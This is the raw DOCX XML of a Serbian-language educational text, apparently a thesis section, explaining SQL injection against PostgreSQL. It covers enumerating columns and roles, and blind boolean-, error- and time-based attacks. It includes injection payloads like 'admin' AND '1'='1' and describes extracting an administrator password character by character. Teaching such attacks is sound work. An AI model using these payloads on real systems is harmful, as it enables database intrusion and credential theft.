          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages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profiles</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Osim pogleda o tabelama (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.tables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), za dodatno izviđanje je moguće dobiti informacije o kolonama unutar neke konkretne tabele. Na slici 20 se može videti primer upita koji preuzima naziv i tip podatka svake kolone iz tabele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4907032" cy="1975558"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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907032" cy="197555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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Slika 20 - Pregled informacija o kolonama specifične tabele</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ughiqyrl6fao" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prikaz korisnika i privilegija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Unutar payload-a je moguće zahtevati informacije o trenutnom korisniku korišćenjem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user</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session_user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, gde </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> govori o korisniku u čije ime se trenutni upit izvršava, dok </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session_user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sadrži naziv korisnika iskorišćenog za autentifikaciju u toku kreiranja sesije. Rezultat upita je vidljiv na slici 21:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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21 - Pregled informacija o korisniku baze podataka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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slučaju je to user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">demo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Osim trenutnog korisnika, napadaču bi značajna informacija bila i koji se sve korisnici i grupe (tzv. ,,uloge’’ - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">roles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> u PostgreSQL sistemu) mogu naći, zajedno sa njihovim privilegijama. Ovo može biti iskorišćeno u cilju eskalacije privilegija unutar nekog sistema. U tabeli 1 se mogu videti neke od kolona iz tabele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_roles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> koje govore o specifičnostima korisnika i grupa baze podataka:</w:t>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665"/>
        <w:gridCol w:w="6105"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1590"/>
            <w:gridCol w:w="1665"/>
            <w:gridCol w:w="6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Naziv kolone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 podatka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 uloge (korisnika ili grupe)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rolsuper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li je uloga superuser, tj. da li ima sve privilegije u bazi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rolcreaterole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Uloga može kreirati dodatne uloge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rolcreatedb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li uloga može kreirati nove baze podataka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rolcanlogin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li se uloga može koristiti za prijavu:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">True -&gt; uloga se ponaša kao korisnik</w:t>
            </w:r>
          </w:p>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 -&gt; uloga se ponaša kao grupa, tj. samo može biti dodeljena korisnicima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Tabela 1 - Informacije o korisnicima i grupama baze podataka</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cwiw5uwznxms" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.4 Blind SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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[4] Svi prethodni primeri i pokušaji SQLi napada su dobijali vidljive rezultate i/ili informacije o greškama od strane baze podataka nakon izvršenja upita. U slučaju da aplikacija ne vraća ove podatke, napadi koji se sprovode nazivaju se Blind (,,slepi’’) SQLi napadi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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obzirom da rezultati nisu vidljivi, mnoge dosadašnje tehnike, kao što su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napadi,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nisu efektivne jer one zahtevaju da konkretni odgovori od strane aplikacije budu dostupni.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Tehnike koje se mogu koristiti za Blind SQLi napade su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>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Boolean-based napadi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Uticanje na logiku originalnog upita tako da se izazove primetna razlika u odgovoru aplikacije u zavisnosti od tačnosti dodatog uslova</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>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Error-based napadi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Namerno izazivanje grešaka u bazi podataka prilikom izvršenja upita (npr. deljenje nulom) kako bi se na osnovu poruke o grešci ili njenog postojanja izvukle informacije</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>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Time-based napadi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Izazivanje kašnjenja u izvršenju upita, gde se tačnost nekog uslova determiniše vremenom koje je potrebno aplikaciji da pruži odgovor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">
      <w:pPr>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Out-of-Band napadi</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Korišćenje naprednih tehnika gde aplikacija komunicira sa napadačem preko posebnog (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-band</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) kanala. Ove tehnike spadaju u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-Band Application Security Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OAST) metode. Primer je slanje DNS upita ka serveru pod kontrolom napadača, gde bi rezultati izvršenja SQL upita bili vidljivi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Svaka od navedenih tehnika ima različit način na koji napadač može izvući podatke, iako direktni odgovori nisu dostupni. U nastavku će biti objašnjen princip rada svake od njih.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i5m34g6wfr5" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based napadi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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aplikacija ne prikazuje rezultate upita, napadač može kreirati payload koji sadrži dodatne logičke uslove. Na osnovu promene ponašanja aplikacije moguće je zaključiti tačnost željenog uslova. Na ovaj način se mogu indirektno dobiti informacije iz baze podataka, čak i ako sami podaci nisu vidljivi u okviru aplikacije.</w:t>
      </w:r>
    </w:p>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Prvi korak je uočavanje razlika u ponašanju aplikacije kada je unet validan unos u poređenju sa slučajem kada je namerno unet nevalidan unos. Na primer, prilikom pretrage postojećeg korisničkog imena aplikacija može prikazati poruku ,,Korisnik pronađen’’, dok u slučaju nepostojećeg korisnika može vratiti poruku ,,Korisnik nije pronađen’’. Ovakva razlika u odgovoru je dovoljna da napadač kroz niz logičkih provera postepeno izvuče skrivene informacije. Ponašanje ovakve aplikacije se može videti na slici 22:</w:t>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3088" cy="1172060"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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843088" cy="117206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22 - Razlika u odgovoru baze podataka</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Promene u ponašanju aplikacije ne moraju uvek biti očigledne. Ponekad je dovoljno da određena poruka nestane, da se promeni statusni kod ili uoči razlika u dužini odgovora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Početni payload može sadržati veoma osnovnu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AND </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">klauzulu, kao što je:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">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admin' AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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ili</w:t>
      </w:r>
    </w:p>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highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' AND '1'='2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prvom slučaju, uslov </w:t>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je uvek tačan, što neće uticati na validnost prvog uslova. U drugom slučaju, uslov će uvek biti netačan, te će aplikacija prijaviti da korisnik ne postoji.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Jedan od načina na koji se ovakvo ponašanje može eksploatisati je vidljiv na slici 23:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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7813" cy="1444598"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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357813" cy="144459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23 - Ispitivanje broja karaktera lozinke</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">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Korišćenjem niza upita moguće je suziti raspon i na kraju odrediti tačna dužina administratorske lozinke. Na osnovu prikazanih rezultata, ustanovljeno je da administratorska lozinka sadrži 12 karaktera.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Identičan princip se može primeniti za determinisanje svakog karaktera lozinke. Na slici 24 prikazan je primer za prvi karakter. Upitima se postepeno ispituje da li je karakter manji ili veći od određene vrednosti. Ovakvim iterativnim poređenjem napadač sužava prostor mogućih vrednosti dok ne pronađe tačnu vrednost karaktera:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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2226477"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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329238" cy="222647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24 - Ispitivanje vrednosti prvog karaktera lozinke</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Iako je u osnovi reč o napadu grube sile (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute-force</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), njegova efikasnost je povećana simuliranjem binarne pretrage nad skupom karaktera, tj. njihovih ASCII vrednosti, čime se smanjuje broj potrebnih upita. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_862ccvcekore" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based napadi</w:t>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Prilikom Error-based napada, napadač namerno izaziva greške u bazi podataka kako bi došao do informacija. Na primer, pokušajem da se izvrši deljenje nulom ili konverzija neadekvatnih tipova može se generisati poruka o grešci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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zavisnosti od konfiguracije, greške koje se prikazuju mogu otkriti detalje o bazi podataka, dok nekad mogu sadržati i same podatke koji se nalaze unutar baze podataka. U slučajevima gde aplikacija ne prikazuje eksplicitnu grešku, dovoljno je i da se razlikuje ponašanje aplikacije kada greška postoji i kada je nema, npr. vraćanjem drugačijeg HTTP statusnog koda. Zbog toga Error-based napadi mogu pretvoriti blind SQLi u vidljiv napad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Koristeći tabelu iz poglavlja o Boolean-based napadima, na slici 25 je vidljiv primer payload-a koji koristi operaciju za konverziju neadekvatnih tipova podataka, konkretno pokušaj konverzije stringa u ceo broj:</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4013" cy="583460"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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434013" cy="58346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25 - Korišćenje konverzije stringa u ceo broj</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Korišćenje neadekvatne konverzije izaziva grešku, ali poruka o grešci sadrži i osetljiv podatak, u ovom slučaju lozinku administratora. Ovaj primer demonstrira da je namerno izazivanje grešaka korisno u cilju prikupljanja podataka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l72pifj13gmx" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based napadi</w:t>
      </w:r>
    </w:p>
